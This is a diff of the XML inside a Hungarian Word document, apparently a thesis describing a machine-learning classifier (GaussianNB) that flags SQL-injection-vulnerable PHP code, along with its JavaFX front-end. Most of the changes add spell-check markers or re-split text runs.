-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Metódus, ami ciklussal végigmegy </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">egyrészt </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">dataset </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>0.oszlopának</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> szavain, és a hozzájuk tartozó</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>word2indenx</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>-beli</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> indexet </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">az </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">X </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>változóba</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> gyűjti</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>. Ennek</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> hosszát később módosítja a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">max_length </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>változóban megadottra, így a vektorok hossza egységes marad.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Másrészt a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">dataset </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">1.oszlopának bináris számain is, amiket pedig az </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">y </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>változóba tesz.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="1134"/>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CF0CC3C" wp14:editId="4CD7F8BB">
-            <wp:extent cx="3784795" cy="1892397"/>
-            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
-            <wp:docPr id="23" name="Kép 23"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId18"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
                       <a:ext cx="3784795" cy="1892397"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
@@ -17368,11 +19454,19 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">saveVectorAs: </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>saveVectorAs</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17408,6 +19502,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> változókat lementi egy-egy </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -17418,7 +19513,14 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>py fájlba.</w:t>
+        <w:t>py</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> fájlba.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -17471,8 +19573,16 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>-on</w:t>
-      </w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>on</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -17557,7 +19667,23 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>kód SQL injectionbeli sebezhetőségével kapcsolatban.</w:t>
+        <w:t xml:space="preserve">kód SQL </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>injectionbeli</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> sebezhetőségével kapcsolatban.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -17620,7 +19746,35 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">egyrészt beolvassa a „toimport” numpy fájlokat, amiket a classifier2 metódusnak ad át, másrészt </w:t>
+        <w:t>egyrészt beolvassa a „</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>toimport</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">” </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>numpy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> fájlokat, amiket a classifier2 metódusnak ad át, másrészt </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17634,6 +19788,7 @@
         </w:rPr>
         <w:t xml:space="preserve">„test” </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -17650,7 +19805,14 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>y fájlokat</w:t>
+        <w:t>y</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> fájlokat</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17682,22 +19844,42 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>trainX, train</w:t>
-      </w:r>
+        <w:t>trainX</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>train</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t>Y</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -17716,14 +19898,34 @@
         </w:rPr>
         <w:t xml:space="preserve"> (</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>testX, testY</w:t>
-      </w:r>
+        <w:t>testX</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>testY</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -17770,7 +19972,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>a test_bmodel metódus</w:t>
+        <w:t xml:space="preserve">a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>test_bmodel</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> metódus</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17854,20 +20070,83 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Látható, hogy a Gaussian Naive Bayes éri el a legnagyobb értéket 73,9%-os pontossággal. Bár minden futás során újragerenálódnak ezek az értékek, de a végeredmény ugyan az: a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>GaussianNB 73% és 77% közötti Recall értékkel az első helyen marad, így a tanulást már ez az algoritmus végzi</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a classifier met</w:t>
+        <w:t xml:space="preserve"> Látható, hogy a Gaussian </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Naive</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Bayes</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> éri el a legnagyobb értéket 73,9%-os pontossággal. Bár minden futás során újragerenálódnak ezek az értékek, de a végeredmény ugyan az: a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>GaussianNB</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 73% és 77% közötti </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Recall</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> értékkel az első helyen marad, így a tanulást már ez az algoritmus végzi</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>classifier</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> met</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17896,11 +20175,19 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">test_bmodel: </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>test_bmodel</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17966,7 +20253,14 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> a korábbi fejezetben,</w:t>
+        <w:t xml:space="preserve"> a korábbi </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>fejezetben,</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17978,7 +20272,49 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> a Confusion Matrix Recall értéke a leghasznosabb, ha egy kód sérülékenységéről van sz</w:t>
+        <w:t xml:space="preserve"> a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Confusion</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Matrix</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Recall</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> értéke a leghasznosabb, ha egy kód sérülékenységéről van sz</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18019,11 +20355,19 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>classifier:</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>classifier</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>:</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18249,7 +20593,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId19">
+                    <a:blip r:embed="rId17">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -18361,25 +20705,13 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>a grafikus felület biztosít ismeretlen adatokat</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, amelyeket a program </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>a ’Tovább’ gomb lenyomás</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>ának hatására</w:t>
+        <w:t xml:space="preserve">a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>front-end</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18387,23 +20719,127 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>first.fxml</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">felhasználói bemenete </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>biztosít ismeretlen adatokat</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, amelyeket a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>back-end</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>first</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Controller</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">e </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>toimport_vulnerabilities.php</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> néven ment el a többi PHP kód közé. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Ez a kód a vektorizálásig ugyan azokon a lépéseken megy végig, mint a többi, ám nem lesz összefűzve </w:t>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> néven ment el a többi PHP kód közé</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, majd navigál át a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>PrimaryController</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-be.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Itt </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a kód a vektorizálásig ugyan azokon a lépéseken megy végig, mint a többi, ám nem lesz összefűzve </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18445,7 +20881,35 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>„toimport” numpy fájlokba ment le.</w:t>
+        <w:t>„</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>toimport</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">” </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>numpy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> fájlokba ment le.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18457,7 +20921,19 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> A grafikus felület </w:t>
+        <w:t xml:space="preserve"> A </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>front-end</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18493,13 +20969,71 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">olvassa be és </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>szemlélteti egy kördiagramon</w:t>
+        <w:t xml:space="preserve">a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>PrimaryController</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>olvassa be és</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a hozzá tartozó </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>primary.fxml</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">szemlélteti </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>kördiagramo</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>n</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18517,14 +21051,19 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>sérülékenységről</w:t>
+        <w:t>z SQL injection veszélye</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ről</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18836,13 +21375,59 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Error Based SQL Injection (SQLi)</w:t>
+        <w:t>Error</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
